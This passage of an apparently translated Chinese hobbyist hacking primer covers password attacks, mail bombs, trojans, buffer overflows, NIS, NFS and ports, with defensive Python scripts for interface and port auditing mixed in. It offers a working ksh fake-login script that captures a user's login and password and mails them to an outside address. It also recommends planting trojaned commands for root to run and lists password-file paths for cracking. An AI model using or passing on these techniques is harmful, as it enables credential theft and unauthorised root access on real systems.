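        m = _HEADER_RE.match(line)
        if m is None:
            continue
        flags = {f.strip() for f in m.group("flags").split(",")}
        if "PROMISC" in flags:
            found.append(m.group("name"))
    return found


def flags_promiscuous(flags_word: int) -> bool:
    """True when a numeric flags word (e.g. the contents of /sys/class/net/eth0/flags) has IFF_PROMISC set."""
    return bool(flags_word & IFF_PROMISC)


def live_listing() -> str:
    """Run whichever of `ip -o link` or `ifconfig -a` is installed; empty string if neither is."""
    for cmd in (["ip", "-o", "link"], ["ifconfig", "-a"]):
        if shutil.which(cmd[0]):
            return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    return ""


if __name__ == "__main__":
    # Check the real host when possible, otherwise demonstrate on the constructed sample.
    listing = live_listing() or SAMPLE_IFCONFIG
    hits = promiscuous_interfaces(listing)
    print("promiscuous interfaces:", ", ".join(hits) if hits else "none")
```

Because an intruder may have replaced ifconfig, as the article notes, reading the /sys flags word with `flags_promiscuous` gives a second opinion that does not depend on that binary.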
● Let me show you the means hackers use to attack passwords. The targets of hacker attacks are usually the passwords of various users. They first use finger against the remote host name to find the user accounts on the host, and then attack by dictionary exhaustion. The principle, based on the fact that users on the network often choose ordinary words as passwords, is to automatically take a word from a machine dictionary and send it to the remote host as the user's password; if the password is wrong, the next word is tried in turn, looping until the correct password is found or the dictionary is used up (this is a blood-vomiting way to work, I couldn't do it, huh). The most typical dictionary cracker is Letmein version 2.0, and I also like the domestic "Wanjo Key" and Xiao Yan's "hack dictionary". If these methods fail, hackers look for weak points in the target machine's security and try to get at the password file, passwd or shadow, stored on the target. In current UNIX systems the basic user information is stored in the passwd file, while all the passwords, encrypted with the DES method, are stored in a separate file called "shadow" that is under strict protection. Old versions of UNIX have no shadow file; their passwords are kept in the passwd file. If a hacker obtains the password file, he uses a program dedicated to cracking DES encryption to crack the passwords. ● Methods of acquiring the password file. 1. When you already have access to the other party's machine, run the following shell commands under ksh:

```sh
clear
stty ignbrk
echo "login: \c"
read logname
stty -echo
echo "Password: \c"
read passwd
print "\nlogin incorrect\n"
print $logname $passwd | mail cxterm.bbs@jet.ncic.an .cn
stty 0
stty echo
exit
```

2. Put programs such as "ls" and "grep" in a directory you can write to, and hope that root runs them (嘿. Although this is a bit like waiting by the tree stump for a rabbit, most of you must do this), and once root runs them you get root privileges. So the current directory "." should not be in root's PATH. 3. A more thorough approach is to recover the plaintext of the encrypted passwords in the passwd file. First you have to get the other party's ciphertext; on a machine with a shadow file you need to get /etc/shadow, otherwise passwd. Once you have it, you can restore the file to readable plaintext. Most of the tools for this are now idiot-proof, so this part is simple.
● E-mail bombs. The e-mail bomb is also one of the attack methods hackers commonly use. Compared with other means a mail bomb is simple and fast. A so-called mail bomb is a large amount of malicious e-mail, sent from an unknown address, full of garbage or abusive words; it is also spam. Everyone's mailbox has limited space, so this mass of garbage fills the mailbox, crowds out normal mail and consumes a lot of network resources, so that the system cannot run normally. Nowadays you can get a lot of these e-mail bombs on the network, and they are becoming a popular trend. 嘿嘿. It seems we should be a little prepared. (I have never used a mail bomb, because I think a mail bomber is rather cowardly.) The most typical e-mail bomb is Kaboom!; the current Kaboom! v3.0 adds many features over earlier versions: it can run uninterrupted, it has a built-in list of commonly used anonymous mail servers, and users can add new ones. It can also subscribe the attacked person to some e-mail discussion groups, and it has some very funny sound effects. After starting the program a small window appears with 3 buttons: Mailbomber (the bomber), Mailing Lists (subscribe someone else) and Close, which is easy to use. But I do not want you to use it because of my article. ● Trojan Horse. I think everyone knows this. A Trojan horse is a kind of malicious, harmful program; what distinguishes a Trojan horse is that it spreads by parasitism or by human "planting". The most famous Trojan horse is PKZIP300; the file name may be pkzip300.zip or an .exe file, and it appears to be the latest version of PKZIP. If you come across it, the most sensible choice is not to download it, because running it will wipe the hard disk and interfere with the use of the modem.
Some people now distinguish remote control tools from Trojans. In fact there is no big difference between them. I will not go into detail here; I just hope everyone understands that the environment a remote controller runs in requires a Trojan (usually this Trojan is called the S end, that is, the server). And many times these are what hackers use.
● About PGP. PGP is an abbreviation of the English "Pretty Good Privacy". Its creator is Phil Zimmermann of the USA. He combined the security and convenience of the RSA public-key system with a conventional encryption system, and designed good mechanisms for digital signatures and key certification management, so PGP is currently a popular encryption package. PGP currently runs on various operating systems such as MS-DOS, UNIX and VAX/VMS. It is encryption software for public use. Everyone knows that data transmitted on the Internet is not encrypted, so if you do not protect your own information, hackers may use it to get at your private data. . . . . PGP's command parameters make me dizzy, because I am only a hobbyist, so I will not spend time and energy studying them, but I know there is a tool called PGPshell that makes it simple to generate your own key.
● What is a buffer overflow? It refers to a means of attacking a system: by writing data longer than the buffer's length into the program's buffer, the buffer overflows and the program's stack is corrupted, making the program execute other commands and so achieving the attacker's aim. The cause of buffer overflows is that the program does not carefully check the parameters a user inputs. The most common technique is to get a shell by overflowing a buffer in a particular program, and then run further commands with the shell's permissions. If that particular program belongs to root and has SUID set, the attacker gets a shell with root privileges. So how do you make a buffer overflow? In fact there are a lot of examples of this online; you can find them yourself, don't ask me, I don't know. ~ - ~ ● About the UNIX system. UNIX grew out of work in 1969 by Ken Thompson, Dennis Ritchie and others on a PDP-7, which later became UNIX. With the involvement of AT&T, Berkeley and other organizations, UNIX developed rapidly and gradually formed two schools: AT&T's System V and Berkeley's BSD (Berkeley Software Distribution). SVR4 is the product of merging the two major schools. At the end of 1991 the Open Software Foundation launched OSF/1 to try to compete with System V, but by now OSF/1 is somewhat of a spent force.
● Location of the password file in different UNIX systems

| System | Path | Token in passwd field |
|---|---|---|
| UNICOS | /etc/udb | * |
| Ultrix 4 | /etc/auth[.dir\|.pag] | * |
| System V Release 4.0 | /etc/shadow | x |
| System V Release 4.2 | /etc/security/* database | x |
| Linux 1.1 | /etc/shadow | * |
| IRIX 5 | /etc/shadow | x |
| EP/IX | /etc/shadow | x |
| HP-UX | /.secure/etc/passwd | * |
| DG/UX | /etc/tcb/aa/user | * |
| ConvexOS 10/11 | /etc/shadow | * |
| BSD4.3-reno | /etc/master.passwd | * |
| A/UX 3.0s | /tcb/files/auth/?/ | * |
| SunOS 5.0 | /etc/shadow | |
| OSF/1 | /etc/passwd[.dir\|.pag] | * |
| SunOS 4.1 c2 | /etc/security/passwd.adjunct | ##username |
| AIX 3 | /etc/security/passwd | ! |
| AIX 3 | /tcb/auth/files/ | # |
| SCO UNIX #.2.x | /tcb/auth/files// | * |
● Basics of scanning tools. There are quite a few security hazards on UNIX, Windows and other platforms and networks, and these hazards often lead to attacks or failures, so naturally a tool is wanted that can scan for these hidden dangers so that they can be fixed and patched. Thus network scanning tools were born. For hackers a scanning tool is an absolutely indispensable attack tool, since hacking cannot do without probing the remote machine's security weaknesses. A scanning tool lets you find a system's security risks, but the user must also have a lot of relevant system security knowledge and must be able to interpret the data the scan produces. You can also write a scanner yourself; in fact a scanning tool is not hard to write. You only need some TCP/IP knowledge and one or more languages such as C, shell or Perl (of course you also have to learn about socket programming) to write your own scanning tool. The principles of most scanning tools are the same; if you are interested in writing one, you can start with a simple port scan program.
● Implementation of the NIS system. NIS (formerly called Yellow Pages, YP) is based on the remote procedure call protocol RPC and uses external data representation (XDR). NIS was developed by Sun Microsystems; its main function is to reduce the administration workload of a UNIX network. It does this by concentrating the configuration files of each machine on an NIS server, so that changing a configuration file on the NIS server completes the configuration of every client. Like any network tool it has its own security problems; masquerading as the NIS server is a rather popular hacker attack method. A frequent NIS security hazard is that the UNIX configuration file /etc/passwd is mapped into passwd.byname and passwd.byuid ... which can let attackers obtain root access. An intrusion using NIS generally uses the Network Interface Tap software module provided by Sun, which can change the source IP address of outgoing packets, so that attackers can masquerade as the NIS server to obtain permissions ...
● About the NFS protocols. The mount protocol is used by NFS clients and NFS servers for the initial negotiation, which covers: returning a handle for a file system, reporting the list of mounted file systems, clearing a client's mounted-file-system records, and listing the file systems a client may mount. The NFS protocol is built on the mount protocol. Through NFS a client can list the directories of a mounted file system, obtain the handle of a file or directory, and even create, read, write and modify files. A correctly set up NFS includes correct configuration of clients and servers, after which NFS is transparent to the user. To use NFS the client runs the biod, rpc.lockd and rpc.statd processes; these are typically started by one of the system's boot script files, or can be started manually ... The server's NFS is provided by starting the nfsd and rpc.mountd processes together with rpc.lockd and rpc.statd. These processes are also typically started by a system boot script file, or you can start them manually.
● About ports. Ever since I learned to go online, whenever I connect to my ISP I am swamped with port numbers, which is confusing ^*^. On each host on the Internet several server processes are usually running. When communicating with such a host it is not enough to give the host's address; you also have to identify a service communication channel on that host, and port numbers are what identify these different service channels. A port number is a 16-bit number, so there can be up to 65535 of them. In practice a port is like a country's border checkpoint: whether it is open or closed says whether the host offers a service, and whether you get through depends on showing your credentials, but do not fling this gate open without control; that is dangerous. Scientifically, a port is like this: ... Many daemon programs can be started on the Internet, most of them serving client programs. Whenever a connection request arrives, a server process is started to communicate with the requesting client machine. To make this possible each application is given a unique address, called a port. FTP is 21, Telnet is 23, the Glacier Trojan is 7626 ... Each application is attached to a particular port, and when a connection request arrives for that port the corresponding application is started (inetd is such a program that launches other applications).
Here are some common ports and the corresponding services or applications targeted by attacks:

* File Transfer Protocol (FTP): TCP port 21
* Telnet: TCP port 23
* Simple Mail Transfer Protocol (SMTP): TCP port 25
* Gopher: TCP port 70
* Finger: TCP port 79
* Hypertext Transfer Protocol (HTTP): TCP port 80
* Network News Transfer Protocol (NNTP): TCP port 119
* System Time Service (NTP): TCP/UDP port 37

Having said this, there is a question: many beginners are now very keen on cracking other people's passwords in chat rooms or on BBSs, but do not know where to start. In fact, because a chat room or BBS corresponds to a port number, if your crack is aimed at the right target, then cracking becomes simple. ^*^
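Relating the netstat -a listing described earlier to the port list above, as an added example that is not part of the original article: this Python script parses netstat output (Windows and Linux net-tools layouts), lists the ports that are accepting traffic, and flags the cleartext services the article warns about (FTP, Telnet, Finger). The netstat output embedded in it is a constructed sample.

```python
"""Audit listening ports from `netstat -an` output against the article's port list.

Added example, not part of the original article. It understands both the
Windows layout ("TCP  0.0.0.0:23  0.0.0.0:0  LISTENING") and the Linux
net-tools layout ("tcp  0  0 0.0.0.0:23  0.0.0.0:*  LISTEN").
"""
import re

# Port-to-service mapping as given in the article's list.
KNOWN_SERVICES = {
    21: "FTP", 23: "Telnet", 25: "SMTP", 37: "Time service",
    70: "Gopher", 79: "Finger", 80: "HTTP", 119: "NNTP",
}

# Services the article calls out as sending logins or account details in the clear.
CLEARTEXT_SERVICES = {21, 23, 79}

# Constructed `netstat -an` output (Windows layout); not captured from a real host.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1045        198.51.100.7:80        ESTABLISHED
  UDP    0.0.0.0:37             *:*
"""

# An endpoint token looks like addr:port; "*:*" and "0.0.0.0:*" do not match (no numeric port).
_ENDPOINT_RE = re.compile(r"^(?P<addr>.+):(?P<port>\d+)$")


def parse_netstat(text: str) -> list:
    """Return (proto, local_addr, local_port, state) for each socket line.

    The local endpoint is the first addr:port token after the protocol
    column, which holds for both layouts (Linux inserts Recv-Q/Send-Q
    counters first). UDP sockets carry no state, so they are labelled "UDP".
    """
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].lower().startswith(("tcp", "udp")):
            continue
        proto = parts[0].lower()[:3]  # tcp6/udp6 fold into tcp/udp
        match = None
        for token in parts[1:]:
            match = _ENDPOINT_RE.match(token)
            if match:
                break
        if match is None:
            continue
        state = parts[-1].upper() if proto == "tcp" else "UDP"
        rows.append((proto, match.group("addr"), int(match.group("port")), state))
    return rows


def listening_ports(text: str) -> list:
    """Sorted (proto, port) pairs that are accepting traffic."""
    return sorted({(proto, port) for proto, _addr, port, state in parse_netstat(text)
                   if state in ("LISTEN", "LISTENING", "UDP")})


def exposed_cleartext_services(text: str) -> list:
    """(proto, port, name) for listening ports whose service transmits credentials in the clear."""
    return [(proto, port, KNOWN_SERVICES[port])
            for proto, port in listening_ports(text) if port in CLEARTEXT_SERVICES]


if __name__ == "__main__":
    for proto, port in listening_ports(SAMPLE_NETSTAT):
        print(f"{proto}/{port:<5} {KNOWN_SERVICES.get(port, 'unknown service')}")
    for proto, port, name in exposed_cleartext_services(SAMPLE_NETSTAT):
        print(f"WARNING: {name} on {proto}/{port} sends logins in the clear; restrict or disable it")
```

To run it against a real machine, pipe `netstat -an` into a file and pass its contents to `exposed_cleartext_services`.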